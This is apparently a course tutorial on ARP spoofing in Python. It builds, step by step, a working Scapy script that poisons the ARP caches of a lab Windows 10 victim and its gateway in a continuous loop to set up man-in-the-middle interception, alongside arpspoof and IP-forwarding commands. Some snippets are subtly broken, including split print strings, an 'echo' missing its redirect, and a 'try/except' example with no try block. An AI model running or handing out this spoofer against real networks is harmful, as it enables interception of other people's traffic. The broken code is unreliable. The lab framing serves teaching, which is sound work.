Python Ethical Hacking

Typical Network

ARP Spoofing

Why ARP Spoofing is possible:

1. Clients accept responses even if they did not send a request.

2. Clients trust response without any form of verification.

1. Run the following command on the victim - Windows 10 Machine.

arp -a

2. Run the following command on the Kali Linux machine.

arp -a

3. Use the tool arpspoof on the Kali Linux to perform the test.

arpspoof -i eth1 -t 10.0.0.210 10.0.0.1

arpspoof -i eth1 -t 10.0.0.1 10.0.0.210

3. Perform the following command again on the victim Windows 10 machine. The MAC address of the router changed to the MAC address of Kali Linux.

arp -a

4. Run the command on Kali Linux.

echo 1 > /proc/sys/net/ipv4/ip_forward

4. Find useful information on the Kali and write the Python code.

#!/usr/bin/env python

import scapy.all as scapy
packet = scapy.ARP(op=2, pdst="10.0.0.210", hwdst="00:0c:29:9b:3f:26", psrc="10.0.0.1")
print(packet.show())
print(packet.summary())

Result:

Python Script:

#!/usr/bin/env python

import scapy.all as scapy
packet = scapy.ARP(op=2, pdst="10.0.0.210", hwdst="00:0c:29:9b:3f:26", psrc="10.0.0.1")
scapy.send(packet)

Execute the script on Kali and watch the change on the victim Windows 10 machine.

Rewrite the Python Script.

#!/usr/bin/env python

import scapy.all as scapy

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet)

spoof("10.0.0.210", "10.0.0.1")
spoof("10.0.0.1", "10.0.0.210")

Execute the script and watch the change on victim Windows 10 machine.

Rewrite the Python script to perform the spoof continuously.

#!/usr/bin/env python

import scapy.all as scapy
import time

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet)

while True:
    spoof("10.0.0.210", "10.0.0.1")
    spoof("10.0.0.1", "10.0.0.210")
    time.sleep(2)

Enable the IP forward on Kali Linux.

echo 1 /proc/sys/net/ipv4/ip_forward

Now the target Win10 machine can browse the Internet normally.

 Use the while structure to show the packets sent count.

#!/usr/bin/env python

import scapy.all as scapy
import time

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)

sent_packets_count = 0
while True:
    spoof("10.0.0.210", "10.0.0.1")
    spoof("10.0.0.1", "10.0.0.210")
    sent_packets_count = sent_packets_count + 2
    print("[+] Packets sent:" + str(sent_packets_count))
    time.sleep(2)

 Execute the Python script.

Rewrite the Python Script in Python2:

#!/usr/bin/env python

import scapy.all as scapy
import time
import sys

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)

sent_packets_count = 0
while True:
    spoof("10.0.0.210", "10.0.0.1")
    spoof("10.0.0.1", "10.0.0.210")
    sent_packets_count = sent_packets_count + 2
    print("
[+] Packets sent:" + str(sent_packets_count)),
    sys.stdout.flush()
    time.sleep(2)

Execute the new script and find the change in the terminal.

Rewrite the script in Python3 compatibility :

#!/usr/bin/env python

import scapy.all as scapy
import time

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)

sent_packets_count = 0
while True:
    spoof("10.0.0.210", "10.0.0.1")
    spoof("10.0.0.1", "10.0.0.210")
    sent_packets_count = sent_packets_count + 2
    print("
[+] Packets sent:" + str(sent_packets_count), end="")
    time.sleep(2)

HANDLING EXCEPTIONS

• try/except can be used to handle errors.
• Write default code in a try block.
• Write code to run if an error occurs in except block.

-> if an error occurs exception block gets executed, otherwise try code gets executed.

Using the try ... catch structure to handle the KeyboardInterrupt Error.

#!/usr/bin/env python

import scapy.all as scapy
import time
import sys

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)

sent_packets_count = 0
while True:
    spoof("10.0.0.210", "10.0.0.1")
    spoof("10.0.0.1", "10.0.0.210")
    sent_packets_count = sent_packets_count + 2
    print("
[+] Packets sent:" + str(sent_packets_count)),
    sys.stdout.flush()
    time.sleep(2)

Execution result:

Rewrite the Python Script to restore the network after quite.

#!/usr/bin/env python

import scapy.all as scapy
import time
import sys

def get_mac(ip):
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)

def restore(destination_ip, source_ip):
    destination_mac = get_mac(destination_ip)
    source_mac = get_mac(source_ip)
    packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)
    scapy.send(packet, count=4, verbose=False)

target_ip = "10.0.0.210"
gateway_ip = "10.0.0.1"

sent_packets_count = 0
try:
    while True:
        spoof(target_ip, gateway_ip)
        spoof(gateway_ip, target_ip)
        sent_packets_count = sent_packets_count + 2
        print("
[+] Packets sent:" + str(sent_packets_count)),
        sys.stdout.flush()
        time.sleep(2)
except KeyboardInterrupt:
    print("[+] Detected CTRL+C ...... Resetting ARP tables...... Please wait")
    restore(target_ip, gateway_ip)
    restore(gateway_ip, target_ip)